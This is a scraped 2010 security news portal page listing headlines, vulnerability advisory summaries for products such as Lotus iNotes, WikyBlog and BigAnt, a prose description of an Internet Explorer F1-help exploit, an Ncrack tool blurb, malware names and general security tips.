|
|
|
New zero-day flaw in Internet Explorer threatens Windows XP users
|
|
Buffer Overflow Vulnerability in Lotus iNotes ActiveX Control
|
|
A Teenager crashes the Sony PlayStation Web Site
|
|
Ultra-secure Firefox offered to UK bank users
|
|
World of Warcraft authenticated users come under attack
|
|
|
|
 |
|
|
|
| | ClamAV Brought into Immunet's Cloud | Thu, Mar 04 2010 | | Security vendors Sourcefire and Immunet have partnered up to swap technologies behind their antivirus products. The new Windows version of ClamAV, the well-known open source antivirus solution from Sourcefire, integrates with Immunet's cloud for better malware intelligence. |
| | | eBay scammer gets four years | Thu, Mar 04 2010 | | The leader of a UK-based gang who made millions selling counterfeit luxury golf kit and other knock-off goods through auction site eBay has been jailed for four years. |
| | | Hackers have corrupted valuable data | Thu, Mar 04 2010 | | Hackers breaking into businesses and government agencies with targeted attacks have not only stolen intellectual property, in some cases they have corrupted data too, the head of the U.S. Federal Bureau of Investigation said Thursday. |
| | | | | Hacking human gullibility with social penetration | Thu, Mar 04 2010 | | Security penetration testers Mike Bailey and Mike Murray rely plenty on attacks that exploit weaknesses in websites and servers, but their approach is better summed up by the famous phrase 'There's a sucker born every minute'. |
| | | | | 'Severe' OpenSSL vuln busts public key crypto | Thu, Mar 04 2010 | | Computer scientists say they've discovered a 'severe vulnerability' in the world's most widely used software encryption package that allows them to retrieve a machine's secret cryptographic key. |
| | | Google: 'no timetable' on China talks | Wed, Mar 03 2010 | | Google has reiterated that it's no longer willing to censor search results in China. But as it continues to censor search results in China, it's not quite sure when this will actually stop. |
| | | Update: Attacks on Google may have been work of amateurs | Wed, Mar 03 2010 | | Contrary to popular assumptions, the recent cyberattacks against Google and more than 30 other high-tech companies were carried out by relatively unsophisticated attackers using outdated botnet tools, according to Damballa Inc., an Atlanta-based security firm. |
| | |
|
|
|
|
| |
70 additonal records not shown
|
|
|
|
|
|
| Exploit of the week |
|
We at CERTStation Labs have selected an exploit that has been released for Microsoft Internet Explorer. It's a
remote command execution exploit that occurs when a user presses F1 on MessageBox originated from VBscript within
a web page. When the user hits F1, the MessageBox help functionality will attempt to load and use a HLP file from
an SMB or WebDAV server. Particular exploit implements a WebDAV server that will serve HLP file as well as a
payload EXE.
|
| |
| Security tool of the week |
|
The security tool of the week selected by CERTStation Labs is Ncrack. Ncrack is a high-speed network authentication
cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and
networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack
was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its
behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.
Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for
very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and
many more.
|
| |
| Website of the week |
| The website selected this week by CERTStation Labs is http://blog.fireeye.com/.
FireEye is an anti-botnet protection, enabling organizations to protect critical intellectual property, computing resources,
and network infrastructure against bot infiltration. Today's most damaging attacks originate from and through highly organized
botnets, or networks of remotely controlled, compromised machines. FireEye delivers a solution that is designed from the
ground up to detect and protect organizations from botnets through a combination of global intelligence and local security
analysis and enforcement.
|
|
|
|
|
|
|
MS confirms 'F1 to pwn' IE bug
|
Wed, Mar 03, 2010 |
|
Microsoft has confirmed that an unpatched Internet Explorer vulnerability makes it potentially dangerous to press F1 if you are running earlier versions of Windows.
A security bug in the VBScript technology bundled with Internet Explorer means that it might be possible to create a web site that displays a specially crafted dialog box that pushes malware providing a victim is tricked into pressing the F1 (help menu) key while viewing a booby-trapped site using Internet Explorer.
|
|
|
|
Buffer overflow in Lotus iNotes
|
Tue, Mar 02, 2010 |
|
The Lotus iNotes ActiveX control for reading email from within a browser contains a programming
error which can result in a buffer overflow. This could be exploited by an attacker to infect
an iNotes user with spyware on visiting a crafted web page.
|
|
|
|
|
|
|
|
|
| | IBM Lotus iNotes Web Access ActiveX Control Buffer Overflow Vulnerability | Fri, Mar 05 2010 | | IBM Lotus iNotes (aka Domino Web Access or DWA) 6.5, 7.0 before 7.0.4, 8.0, 8.0.2 and before 229.281 for Domino 8.0.2 FP4 are prone to buffer overflow vulnerability. The issue occurs due to improper processing of long URL argument to an unspecified method in the Lotus Domino Web Access ActiveX control. This could be exploited by remote attackers to execute arbitrary code on the vulnerable system. | | Severity |  |
|
| | | IBM Lotus iNotes Get Filter CSRF Vulnerability | Thu, Mar 04 2010 | | Cross-site request forgery vulnerability has been discovered in IBM Lotus iNotes (aka Domino Web Access or DWA), version before 229.281 for Domino 8.0.2 FP4. The issue is triggered due to an error in the application while handling the vectors related to Get Filter and Referer Check fixes. Exploitation of the vulnerability requires that the users must voluntarily interact with the attack mechanism. This could allow a remote attacker to hijack the authentication of unspecified victims. | | Severity | |
|
| | | IBM Lotus iNotes Get Filter XSS Vulnerability | Thu, Mar 04 2010 | | Cross-site scripting vulnerability has been discovered in IBM Lotus iNotes (aka Domino Web Access or DWA), version before 229.281 for Domino 8.0.2 FP4. The issue is triggered due to an error in the application while handling the vectors related to Get Filter and Referer Check fixes. Exploitation of the vulnerability requires that the users must voluntarily interact with the attack mechanism. This could allow a remote attacker to inject arbitrary web script. | | Severity | |
|
| | | Joomla! Core Design Scriptegrator Plugin Directory Traversal Vulnerabilities | Mon, Mar 01 2010 | | Core Design Scriptegrator plugin 1.4.1 for Joomla! is prone to multiple directory traversal vulnerabilities. The issues occur due to improper sanitization of "file" parameter to 'libraries/jquery/js/ui/jsloader.php' and "files[]" parameter to 'libraries/jquery/js/jsloader.php'. This could be exploited by remote attackers to include and execute arbitrary local files via directory traversal sequences. Successful exploitation requires that "magic_quotes_gpc" is disabled. | | Severity | |
|
| | | WikyBlog 'WBmap.php' File Inclusion Vulnerability | Mon, Mar 01 2010 | | PHP remote file inclusion vulnerability has been discovered in WikyBlog, version 1.7.3rc2. The issue is triggered due to an input validation error in the 'include/WBmap.php' script while handling in the "langFile" parameter. Exploitation of the vulnerability requires that the users must voluntarily interact with the attack mechanism. This could allow a remote attackers to execute arbitrary PHP code. | | Severity | |
|
| | | WikyBlog 'jsessionid()' Session Fixation Vulnerability | Mon, Mar 01 2010 | | Session fixation vulnerability has been discovered in WikyBlog, version 1.7.3rc2. The issue is triggered due to an input validation error in the the "jsessionid" parameter while handling the 'index.php/Comment/Main', 'index.php/Comment/Main/Home_Wiky', or 'index.php/Edit/Main' scripts. This could allow a remote attackers to hijack web sessions. | | Severity | |
|
| | | WikyBlog 'index.php' Unrestricted File Upload Vulnerability | Mon, Mar 01 2010 | | Unrestricted file upload vulnerability has been discovered in WikyBlog, version 1.7.3rc2. The issue is triggered due to an input validation error in the 'index.php/Attach' script when using the 'uploadform' action while handling a direct request to the file in 'userfiles/[username]/uploaded/'. This could allow a remote authenticated users to execute arbitrary code by uploading a file with an executable extension. | | Severity | |
|
| | | DateV 'DVBSExeCall.ocx' Remote Command Execution Vulnerability | Sun, Feb 28 2010 | | DVBSExeCall.ocx in DATEV Base System (aka Grundpaket Basis) is prone to command execution vulnerability. The issue occurs due to improper sanitization of certain inputs to "ExecuteExe" method in the 'DVBSExeCall Control' ActiveX control 1.0.0.1in 'DVBSExeCall.ocx'. This could be exploited by remote attackers to execute arbitrary command on the vulnerable system. | | Severity | |
|
| | | BigAnt Server Multiple Buffer Overflow Vulnerabilities | Fri, Mar 05 2010 | | Multiple buffer overflow vulnerabilities have been discovered in BigAnt Server, versions 2.50 SP6 and previous. The issue arises due to improper handling of "Update" or "Plug-In" console menu item when victim uses it. This could be exploited by a remote attacker to cause a denial of service via a crafted ZIP file. | | Severity |  |
|
| | | BigAnt IM Server HTTP GET Request Stack Based Buffer Overflow Vulnerability | Fri, Mar 05 2010 | | Stack based buffer overflow vulnerability has been discovered in BigAnt IM Server, version 2.50. The vulnerability is triggered due to the boundary condition error in AntServer Module (AntServer.exe) when processing overly long HTTP GET requests sent to port 6660/TCP. This could be exploited by a remote attacker to execute arbitrary code on a vulnerable system. | | Severity | |
|
|
|
|
|
|
| |
53 additonal records not shown
|
|
|
|
|
|
|
| | FakeAlert-WwSec | Mon, Mar 01 2010 | | Severity |  | | Aliases: | | | Infects: | Windows 2000,Windows 98,Windows Me,Windows NT,Windows Server 2003,Windows Vista,Windows XP |
|
| | | FakeAlert-Krypt | Mon, Mar 01 2010 | | Severity | | | Aliases: | | | Infects: | Windows Me,Windows XP |
|
| | | Packed.Generic.290 | Mon, Mar 01 2010 | | Severity | | | Aliases: | | | Infects: | Windows 2000,Windows 95,Windows 98,Windows Me,Windows NT,Windows Server 2003,Windows Vista,Windows XP |
|
| | | W32.Scrshotvid | Sat, Feb 27 2010 | | Severity | | | Aliases: | | | Infects: | Windows 2000,Windows 95,Windows 98,Windows Me,Windows NT,Windows Server 2003,Windows Vista,Windows XP |
|
|
|
|
|
|
| |
0 additonal records not shown
|
|
|
|
|
Security
Sparklines |
|
Microsoft |
|
OS X |
|
Windows
XP |
|
Linux |
|
Internet
Explorer |
|
Mozilla |
|
Sparklines show the number of articles that referenced a given topic everyday over the last 12 weeks |
|
|
|
|
|
Podcast
|
|
|
Tips of the week |
|
Learning how things work
|
|
In the world of information technology there are many books available about how to protect network environment,
but are they really worth it? If we assume that those techniques work then why would an organization gets
intruded/hacked? The reason would be that those books and manual don't work in practical life. Hackers are evolving
there attacks to suit the new era. They now launch a more sophisticated way of attacks on network environment than
ever before and there are lots of example out there. The best way to fight those intrusions is to learn their ways
by doing it. By doing it we don't mean that we should start attacking our own network or some other network over
the Internet but we should do this in a lab environment, there are already a lot of how-to available on the Internet
about this subject.
|
|
|
|
Turn off IPv6
|
|
Internet Protocol version 6 (IPv6) provides a new Internet layer of the TCP/IP protocol suite
that replaces Internet Protocol version 4 (IPv4) and provides many benefits. Currently there
are no good tools out which are able to check a system over network for IPv6 security issues.
Most Linux distribution comes by default enabling IPv6 protocol. Attackers can send bad traffic
via IPv6 as most administrators are not monitoring it. Unless network configuration requires it
disable IPv6 or configure IPv6 on firewall.
|
|
|
|
Accounts and Password policy
|
|
Creating accounts on a system is day to day job for an IT department and there
are lots of places where they have to manage things like in a lab room, conference
room, visitor's lounge, working environment and servers. While making new
accounts people have to be careful while giving rights and choosing a right
password. For example, a good password includes at least 8 characters long and
mixture of alphabets, numbers, and special character, upper & lower alphabets. But
they should also focus on group policy, they shouldn't allow a normal user account
on such places where there is no need for it.
|
|
|
|
|
|
Metrics |
| Last
Week |
|
| Viruses |
0 |
| Worms |
1 |
| Trojans |
3 |
| Vulnerabilities |
63 |
| Total
Records* |
|
| Viruses |
415 |
| Worms |
1545 |
| Trojans |
2071 |
| Vulnerabilities |
15274 |
*since 2004 |
|
|
|
|
|
|
